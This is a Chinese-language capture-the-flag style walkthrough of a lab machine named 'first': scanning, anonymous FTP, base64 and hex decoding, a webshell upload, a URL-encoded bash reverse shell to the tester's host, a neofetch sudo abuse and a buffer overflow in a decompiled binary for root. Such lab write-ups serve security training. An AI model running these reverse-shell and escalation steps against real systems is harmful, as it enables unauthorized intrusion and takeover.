【OSCP】first

admin 2024年9月28日11:17:44评论13 views字数 3974阅读13分14秒阅读模式
【OSCP】first

OSCP 靶场

【OSCP】first

靶场介绍

first

easy

ftp利用、Stegseek 利用、文件上传、十六进制解码、idaghidra 逆向elf、缓冲区溢出提权

信息收集

主机发现

nmap -sn 192.168.1.0/24

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.43
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 23:41 EST
Nmap scan report for 192.168.1.43
Host is up (0.00073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 0 0 4096 Aug 09 2022 fifth
| drwxr-xr-x 2 0 0 4096 Aug 10 2022 first
| drwxr-xr-x 2 0 0 4096 Aug 09 2022 fourth
| drwxr-xr-x 2 0 0 4096 Aug 09 2022 seccond
|_drwxr-xr-x 2 0 0 4096 Aug 09 2022 third
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b8:57:5b:81:5a:78:1f:d6:ff:60:39:bb:32:a8:5d:cd (RSA)
| 256 65:8d:43:ec:63:77:d0:39:c0:1b:3e:40:d9:53:1e:ed (ECDSA)
|_ 256 0f:02:ac:df:e1:31:3c:b2:59:f6:b7:59:09:f1:ff:f8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:1F:16:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 192.168.1.43

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.43 -x html,php,txt -e 

【OSCP】first

权限获取

【OSCP】first

ftp 可以匿名访问,我们从ftp 中获取图片,读取隐写信息

【OSCP】first

【OSCP】first

┌──(root㉿kali)-[~]
└─# echo "SGkgSSBoYWQgdG8gY2hhbmdlIHRoZSBuYW1lIG9mIHRoZSB0b2RvIGxpc3QgYmVjb3VzZSBkaXJlY3RvcnkgYnVzdGluZyBpcyB0b28gZWFzeSB0aGVlc2UgZGF5cyBhbHNvIEkgZW5jb2RlZCB0aGlzIGluIGJlc2E2NCBiZWNvdXNlIGl0IGlzIGNvb2wgYnR3IHlvdXIgdG9kbyBsaXN0IGlzIDogMmYgNzQgMzAgNjQgMzAgNWYgNmMgMzEgNzMgNzQgNWYgNjYgMzAgNzIgNWYgNjYgMzEgNzIgMzUgNzQgZG8gaXQgcXVpY2sgd2UgYXJlIHZ1bG5hcmFibGUgZG8gdGhlIGZpcnN0IGZpcnN0IA==" | base64 -d

Hi I had to change the name of the todo list becouse directory busting is too easy theese days also I encoded this in besa64 becouse it is cool btw your todo list is : 2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74 do it quick we are vulnarable do the first first

【OSCP】first

对十六进制 进行解码

2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74

【OSCP】first

【OSCP】first

得到待办清单

【OSCP】first

再次扫描目录,获取文件上传接口

【OSCP】first

【OSCP】first

直接上传webshell

【OSCP】first

【OSCP】first

http://192.168.1.43/t0d0_l1st_f0r_f1r5t/uploads/1.php?cmd=bash+-c+%27bash+-i+%3E%26/dev/tcp/192.168.1.129/8989+0%3E%261%27

【OSCP】first

python3 -c 'import pty;pty.spawn("/bin/bash")'
或者
script /dev/null -c bash

Ctrl + Z
stty raw -echo ;fg
stty rows 38 columns 116
export TERM=xterm

【OSCP】first

权限提升

sudo 查看考first 用户使用neofetch 不用密码

https://gtfobins.github.io/gtfobins/neofetch/

【OSCP】first

www-data@first:/tmp$ cat $TF                                 
exec /bin/sh
www-data@first:/tmp$ echo "exec /bin/sh" > shell
www-data@first:/tmp$ sudo -u first /bin/neofetch --config ./shell
$ id
uid=1000(first) gid=1000(first) groups=1000(first),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
$ whoami
first
$ script /dev/null -c bash
Script started, file is /dev/null
first@first:/tmp$ ls
shell tmp.0cm8LMj6Sc tmp.DiFT6Jhhi4
first@first:/tmp$

【OSCP】first

再次查看sudo,发现如下程序不需要密码可以执行。执行后需要密码。

irst@first:/tmp$ sudo -l
Matching Defaults entries for first on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User first may run the following commands on first:
(ALL) NOPASSWD: /bin/secret

【OSCP】first

cd /tmp/secret /tmp
python3 -m http.server
wget http://192.168.1.43:8000/secret

file 查看是elf 文件,我们下载后使用ida 进行反编译。

【OSCP】first

这里可以看到local_c != 0为真时,进入system 函数。local_16 变量的长度为10个字符。这和之前缓冲区溢出的提示关联在一起了。因此我们直接超过10个字符使用缓冲区溢出成功提权到root权限。

undefined8 main(void)

{
char local_88 [114];
char local_16 [10];
int local_c;

std::operator<<((basic_ostream *)std::cout,"pass: ");
local_c = 0;
std::operator>>((basic_istream *)std::cin,local_16);
if (local_c == 0) {
std::operator<<((basic_ostream *)std::cout,"wrong");
}
else {
std::operator<<((basic_ostream *)std::cout,"correct, input command:");
std::operator>>((basic_istream *)std::cin,local_88);
system(local_88);
}
return 0;
}

【OSCP】first

【OSCP】first

End

“点赞、在看与分享都是莫大的支持”

【OSCP】first

【OSCP】first

原文始发于微信公众号(贝雷帽SEC):【OSCP】first

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日11:17:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】firsthttps://cn-sec.com/archives/3101607.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息